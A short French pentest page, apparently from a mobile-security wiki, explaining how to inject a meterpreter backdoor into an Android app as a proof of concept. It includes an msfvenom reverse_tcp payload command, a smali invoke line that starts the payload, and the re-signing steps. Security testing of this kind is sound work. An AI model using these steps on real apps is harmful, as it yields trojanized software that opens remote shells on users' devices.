# Injection de backdoor Si l'application ne semble pas faire de vérification d'intégrité, il peut être intéressant de PoC l'impact rendu possible en y ajoutant un payload meterpreter afin de montrer qu'il est possible de modifier l'application pour la transformer en trojan. ## Étapes à suivre * Générer une charge utile avec msfvenom `$ msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R > payload.apk` * [Décompiler l'application cible](https://blog.s1rn3tz.ovh/pentest-mobile/reverse-engineering#edition-dun-apk) et l'application créée par msfvenom * Placer le code smali de l'application msfvenom dans le répertoire contenant le code smali de l'application cible. /path/to/payload/smali/com/metasploit/stage dans /path/to/target/smali/com/metasploit/stage * Repérer l'activité principale de l'application cible dans son manifest. * Dans le code smali de l'activité principale, trouver le moyen d'appeler le code smali de l'application msfvenom.

Deviens, `invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V`

* Ajouter les permissions nécessaires à l'application dans son manifest pour faire fonctionner meterpreter de façon optimale. * [Recompiler l'application cible modifiée et l'auto-signer](https://blog.s1rn3tz.ovh/pentest-mobile/reverse-engineering#edition-dun-apk). * Lancer l'application et vérifier que le shell est bien lancé dans le listener. ## Ressource {% embed url="" %} ## Outils ### Evil-Droid Permet de faire exactement la même chose de manière semi-automatisé. ressource: